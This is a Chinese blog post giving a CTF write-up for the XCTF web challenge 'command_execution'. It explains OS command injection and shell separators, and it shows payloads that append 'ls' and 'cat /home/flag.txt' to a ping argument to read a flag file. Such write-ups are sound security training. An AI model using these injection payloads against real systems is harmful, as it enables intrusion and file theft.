热门标签
热门文章
- 1【数据分析报告】携程客户分析与流失预测_携程数据分析
- 2三维重建中如何进行深度测距
- 3496.下一个更大元素
- 4支持向量机(SVM)算法简介_支持向量机的基本思想
- 5C++代码调试,基于visual studio篇_visusl stdio调试c++
- 6安卓高级控件(下拉框、列表类视图、翻页类视图、碎片Fragment)_安卓下拉框控件
- 7SoundStream VS Lyra: 谷歌今年新推出的两款AI音频编解码器有何不同?
- 8Android 消息推送之MQTT及采坑_mqttandroidclient订阅成功收不到消息
- 9AI视频教程下载:使用ChatGPT进行市场营销
- 10Window下部署使用Stable Diffusion AI开源项目绘图_stable diffusion开源项目
当前位置: article > 正文
xctf web之 command_execution
作者:羊村懒王 | 2024-05-24 13:28:28
赞
踩
xctf web之 command_execution
打开题目
源代码也没东西
题目为 命令执行 并且题目提示没 waf 肯定就用到命令执行漏洞
先介绍一下 命令执行漏洞:
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。
常见连接符
;A;B 先执行A,再执行B
& A&B 简单拼接,A B之间无制约关系
| A|B 显示B的执行结果
&& A&&B A执行成功,然后才会执行B
|| A||B A执行失败,然后才会执行B
先 ping 127.0.0.1&&ls
发现没有可用的线索
ping 127.0.0.1&& ls . . / . . / . . /
发现
查看home 目录
发现
直接
ping 127.0.0.1 && cat /home/flag.txt
得到flag
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/617621
推荐阅读
相关标签
